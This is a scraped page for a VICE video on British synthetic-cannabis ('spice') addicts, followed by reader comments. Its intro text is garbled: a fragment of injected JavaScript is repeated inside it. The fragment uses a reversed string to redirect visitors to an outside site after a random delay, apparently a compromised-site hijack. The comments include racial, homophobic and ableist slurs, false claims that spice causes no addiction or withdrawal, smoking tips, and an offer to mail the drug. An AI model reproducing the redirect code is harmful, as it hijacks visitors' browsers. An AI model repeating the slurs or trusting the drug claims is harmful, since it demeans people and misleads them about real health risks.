The Hard Lives of Britain's Synthetic Marijuana Addicts

Legal highs are set toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be outlawed by the British government in response toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to a growing number of news reports about students overdosing on the synthetic drugs after using them recreationally. On the eve of the ban, VICE travelled toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Manchester toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to meet some more vulnerable users who have become addicted toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to these over-the-counter substances and discovered that solving the problem won’t be as simple as making legal highs illegal.

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46 thoughts on “The Hard Lives of Britain's Synthetic Marijuana Addicts”

  1. yaramar34 says:

    Pathetic waste of space = anagram of Manchester Titch

  2. Thomas Robinson says:


  3. Jenny Shute says:

    I smoked spice no good. The detox is horrible. I understand, I really understand.

  4. Jenny Shute says:

    I no longer smoke spice

  5. 8-Brit Generation says:

    How can you overdose on something that’s not for human consumption, surely that means a single mistake is an overdose?

  6. Tessa Kilker-Ingerson says:

    6:00 that's kind of what it looked like when I was withdrawing off of heroin. Sweating, barfing, can't sit still, pains everywhere. That's scary, man. I didn't even think synthetic "weed" was still a popular thing anywhere. Hope these kids are doing better these days. I've been clean off heroin for almost 7 years now. Heroin is more rampant than ever where I live.

  7. Scott Carlass says:

    Spice is insane and I know first hand because I smoked a version of it for six months straight while I was on probation. I claimed I would never smoke it if I could smoke real weed, but I had to pass drug tests, so let's get the ubiquitous point out of the way: the government exacerbates drug epidemics. There are various kinds of spice: some that pack a punch and only last a 20 minutes or so per high (like crack) and some that can last up to eight hours, or so I've heard. I smoked the cracklike kind and was in a terrible mood if I couldn't smoke every half hour or so. It ruined my lungs like real weed never did and by the end of those six months I was constantly coughing liquid shite from my lungs. I started to sell it in small pieces, here or there, to support my not-too-bad $60/ounce per week habit and once I decided to not sell to this piece of shit that was knocking on my door and blowing up my phone all day, he wound up throwing a rock through my window (however, I much mention that this was after I pulled a baseball bat on him and threw his phone across the street after he threatened to call the cops on me – for what? Not selling drugs? That's right). That's when I felt the gravity of the situation and knew that spice was/is pretty much like crack. Stick to your opioids, kids.

  8. John Smithen says:

    I remember hearing about this stuff years back… I never gave it much thought, but after watching this, I'm shocked at its effects and withdrawls people can have… But nooooooooooooo heaven forbid cannabis be legalized! The devils grass right? Ppl would have to smoke acres of the shit before they actually od on it.. There's no ill effect, other than if you smoke it over a years and years with rolling papers.. (the rolling papers would cause issues). God bless the new world.

  9. fonomanu101 says:

    What’s the point, why make weed illegal cause of how “dangerous” it is, and make a legal drug 100x worse

  10. MetalHeadZ says:

    Time to snort some Turmeric, nutmeg and ginger!!! BWAAAAAAAAAAAAA!!!!!!!!! AHHAHHHHHHHH AHHHHHHHHHHH!!!!!!!!!!

  11. Corey Franklin says:

    Spice isn't made to be smoked heavy or in blunts, you supposed to smoke pin joints. And take small hits then put it out. No become a spice cheefer!

  12. christopher swett says:

    I smoke bud on the regular, one day I was walking through my neighborhood and ran into an old "friend" he asked if I wanted to smoke a joint of some spice with him, I had no idea what it was, he explained it's like smoking bud, ok I'm down! Well I smoke about half of that joint, I couldn't move from where I was sitting everything seemed like it was flying by me while I sat completely still, my heart rate felt like it was through the roof, I thought I was going to die. Well the dude that gave it to me told me this weird but comforting story, at the end of the story I was no longer high. I will never touch that shit again! I love bud, I will stick with that.

  13. ok says:

    Dude said "ye thats about 40 spliffs right" while looking at like 2g of the herb

  14. Alexandra Seeberger says:

    I feel so bad for this dude that’s having the physical withdrawal symptoms. I wanna know who saw this incense and was like “yeah mate let’s actually roll a spliff outta this and smoke it”. But I guess someone has to do it first for everyone else to find out about it. I’ve lost many people to heroin. This reminds me a lot of that.

  15. Austin Starke says:

    I am so absolutely fortunate to say today that I smoke Marijuana and not a single thing else. It's been a long road, but I'm finally getting somewhere in life. Weed is fine in my book

  16. Kole Lummerding says:

    Hahahaha that’s so gay

  17. finn bingham says:

    i was smoking a bowl whie watching this lol this is ridiculous but thats the goverment they care about money thats it that beautiful magical plant called cannabis would put a huge dent in the medical industry

  18. PumpBoffBag says:

    When the presenter starts talking at 0:36 it sounds like he’s spitting really lazy bars

  19. Sound Tribe says:

    this is just propaganda jokes, to help the govt making this stuff illegal seem more legit. you can't get addicted to synthetic THC lol, you just stop smoking it. theres no physical withdrawals… only 2 things in the world cause that: opiates and alcohol/benzos… latter which you can die from. every other drug is safe if not used in an overdose amount. these UK fags are just pussies.

    when i was a kid one dude went to "rehab" for synthetic weed and was made fun of his entire life after… and it did literally nothing, bc theres NO drug/medicine that can be used to treat this except putting them to sleep if theyre too stupid and weak willed to stop on their own. he just switched back to regular weed and carried on with life.

    wasted documentary on retards…thats VICE tho, creating drugs. like the one about africans w a "deadly" new drug but it was just heroin weed and rat poison mixed bc the nigs thought it somehow made you high not realizing it was just poison killing their brain cells and the extremely low dose of terrible heroin. lol….

  20. Sound Tribe says:

    this isnt a drug like heroin.. you cant get withdrawals or even be addicted, its all will power. if they're STILL addicted to fake weed it's their fault, and only them being a retard in the first place to think they were addicted. just stop and you're good. if you're that much of a pussy just switch back to regular weed for a week then stop. problem solved. no documentary needed but VICE was thirsty. cmon wake up kids/mentally challenged people

  21. Sound Tribe says:

    stop deleting my truthful comments youtube. wtf? just bc im not agreeing that its an evil drug with withdrawals? look it up… its all in these retards heads that theyre "addicted" and people like VICE calling them addicts. all they have to do is stop and its fine… or switch to reg weed for a week or so if you're really a pussy. this isnt heroin or alcohol/benzos. any other drug is just people being a bitch… the latter you can die from, heroin is just insane feeling being sick, but every other drug is just all in your head lol. thats why coke/crackheads get made fun of at rehabs/detoxes…your grandmas anti depressants have a worse withdrawal time than meth or coke which is only mental…and by far this stuff which doesnt even have any either.

  22. Anonimni Profil says:

    I want to try this shit so bad.

  23. MorallyAwkward says:

    If this guy is withdrawing off this shit in 2 hours, that would make it worse than even heroine.

  24. Ashton Lindgren says:

    Synthetic weed BRUH

  25. Corey Barker says:

    My coworker almost died a few times from Spice, and knew of people that took that shit

  26. mad Rascal says:

    That white t shirt guy was not a good actor .

  27. DC Derek says:


  28. Antonio Montana says:

    Is this from Robocop?

  29. David Milewski says:

    If this shit is not for human consumption wtf is it in stores? Fucking people killing people.

  30. Breeze says:

    Synthetic huh

  31. Volka 21 says:

    I'd rather do meth.

  32. Joey J says:

    The following workers at vice are all secretly drug dealers in a huge vice drug ring.

  33. Tyler says:

    I’ve smoked spice not intentionally and I can’t fathom how this shit is legal it was one of the worst experiences in my life

  34. malaperdas malaperdas says:

    Spice: exists

    Real Marijuana: AM I A JOKE TO YOU

  35. L F 2nd says:

    It's legal out here Ill mail it to you

  36. meatpyramid says:

    Natural weed is bad because it’s not turns people into the zombie buyers and you can’t make lifelong profit of it.

  37. Matita says:

    Spice makes holes in your brain the size of quarters

  38. STR8murduhGames says:

    I want a good look at it so i can tell the fucking differences but i cant find a good look at it anywhere. Anyone know how i can find it?

  39. sxlti gl5 says:

    Spice stopped my heart and basicly killed me I know what this shit does to our country

  40. Ganja Train says:

    This is a nice video!

  41. TheManJordo says:

    It's not even addictive

  42. EnoFC says:

    Don't do drugs, don't start it don't try it. If a friend tells you or pressures you to, tell them to fuck off and cut them from your life.
    I never have and never will try drugs. I don't even take headache pills my doctor prescribes me.

  43. DEANO LAING says:

    Talks shit that titch av saw him on life on the dole let him rot peace of shit

  44. ahmed khammash says:

    Is this drug still legal??!

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